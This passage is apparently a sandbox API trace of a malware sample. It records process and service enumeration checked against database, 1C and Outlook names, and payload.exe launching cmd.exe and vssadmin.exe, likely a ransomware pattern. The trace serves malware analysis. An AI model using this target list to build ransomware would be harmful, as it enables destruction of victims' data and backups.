lpString2="Winmgmt") returned -1 [0042.904] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0042.904] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0042.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0042.904] lstrlenW (lpString="WPDBusEnum") returned 10 [0042.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0042.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0042.904] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0042.904] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0042.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0042.904] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0042.904] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x200 [0042.907] Process32FirstW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0042.908] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0042.909] lstrlenW (lpString="System") returned 6 [0042.909] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0042.909] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0042.909] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0042.909] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0042.909] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0042.909] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0042.909] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0042.909] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0042.909] lstrlenW (lpString="smss.exe") returned 8 [0042.909] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0042.910] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0042.910] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0042.910] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0042.910] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0042.910] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0042.910] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0042.910] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0042.910] lstrlenW (lpString="csrss.exe") returned 9 [0042.910] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0042.910] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0042.910] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0042.910] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0042.910] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0042.911] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0042.911] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0042.911] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0042.911] lstrlenW (lpString="wininit.exe") returned 11 [0042.911] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0042.911] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0042.911] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0042.911] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0042.912] lstrlenW (lpString="csrss.exe") returned 9 [0042.912] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0042.913] lstrlenW (lpString="winlogon.exe") returned 12 [0042.913] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0042.913] lstrlenW (lpString="services.exe") returned 12 [0042.913] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0042.914] lstrlenW (lpString="lsass.exe") returned 9 [0042.914] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0042.915] lstrlenW (lpString="lsm.exe") returned 7 [0042.915] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.916] lstrlenW (lpString="svchost.exe") returned 11 [0042.916] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.916] lstrlenW (lpString="svchost.exe") returned 11 [0042.916] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.917] lstrlenW (lpString="svchost.exe") returned 11 [0042.917] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.918] lstrlenW (lpString="svchost.exe") returned 11 [0042.918] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.918] lstrlenW (lpString="svchost.exe") returned 11 [0042.918] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0042.919] lstrlenW (lpString="audiodg.exe") returned 11 [0042.919] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.920] lstrlenW (lpString="svchost.exe") returned 11 [0042.920] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.920] lstrlenW (lpString="svchost.exe") returned 11 [0042.920] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0042.921] lstrlenW (lpString="dwm.exe") returned 7 [0042.921] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0042.922] lstrlenW (lpString="explorer.exe") returned 12 [0042.922] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0042.923] lstrlenW (lpString="spoolsv.exe") returned 11 [0042.923] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0042.923] lstrlenW (lpString="taskhost.exe") returned 12 [0042.923] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.924] lstrlenW (lpString="svchost.exe") returned 11 [0042.924] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0042.925] lstrlenW (lpString="taskeng.exe") returned 11 [0042.925] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0042.925] lstrlenW (lpString="taskhost.exe") returned 12 [0042.925] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0042.926] lstrlenW (lpString="carried trinity.exe") returned 19 [0042.926] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0042.927] lstrlenW (lpString="heaven.exe") returned 10 [0042.927] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0042.927] lstrlenW (lpString="dell.exe") returned 8 [0042.927] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0043.038] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0043.038] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0043.039] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0043.039] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0043.040] lstrlenW (lpString="til ear equal.exe") returned 17 [0043.040] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0043.040] lstrlenW (lpString="itunes-bring.exe") returned 16 [0043.040] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0043.041] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0043.041] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0043.042] lstrlenW (lpString="philadelphia.exe") returned 16 [0043.042] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0043.042] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0043.042] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0043.043] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0043.043] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0043.046] lstrlenW (lpString="fraud stuck.exe") returned 15 [0043.046] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0043.047] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0043.047] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0043.047] lstrlenW (lpString="attended.exe") returned 12 [0043.048] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0043.048] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0043.048] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0043.049] lstrlenW (lpString="pan physician.exe") returned 17 [0043.049] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0043.049] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0043.050] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0043.050] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0043.050] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0043.051] lstrlenW (lpString="over-celebrity.exe") returned 18 [0043.051] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0043.051] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0043.052] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0043.052] lstrlenW (lpString="payload.exe") returned 11 [0043.052] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0043.053] lstrlenW (lpString="cmd.exe") returned 7 [0043.053] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0043.054] lstrlenW (lpString="conhost.exe") returned 11 [0043.054] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0043.054] lstrlenW (lpString="vssadmin.exe") returned 12 [0043.054] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0043.056] lstrlenW (lpString="VSSVC.exe") returned 9 [0043.057] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.057] lstrlenW (lpString="svchost.exe") returned 11 [0043.057] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0043.058] CloseHandle (hObject=0x200) returned 1 [0043.058] Sleep (dwMilliseconds=0x1f4) [0043.591] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626e60 [0043.591] EnumServicesStatusExW (in: hSCManager=0x626e60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0043.591] GetLastError () returned 0xea [0043.591] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x6c08c8 [0043.592] EnumServicesStatusExW (in: hSCManager=0x626e60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0043.592] CloseServiceHandle (hSCObject=0x626e60) returned 1 [0043.592] lstrlenW (lpString="Appinfo") returned 7 [0043.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0043.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0043.592] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0043.592] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0043.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0043.593] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0043.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0043.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0043.593] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0043.593] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0043.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0043.593] lstrlenW (lpString="AudioSrv") returned 8 [0043.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0043.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0043.593] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0043.593] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0043.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0043.593] lstrlenW (lpString="BFE") returned 3 [0043.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0043.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0043.593] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0043.593] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0043.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0043.593] lstrlenW (lpString="CryptSvc") returned 8 [0043.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0043.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0043.593] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0043.593] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0043.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0043.593] lstrlenW (lpString="CscService") returned 10 [0043.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0043.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0043.593] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0043.593] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0043.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0043.593] lstrlenW (lpString="DcomLaunch") returned 10 [0043.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0043.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0043.593] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0043.594] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0043.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0043.594] lstrlenW (lpString="Dhcp") returned 4 [0043.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", 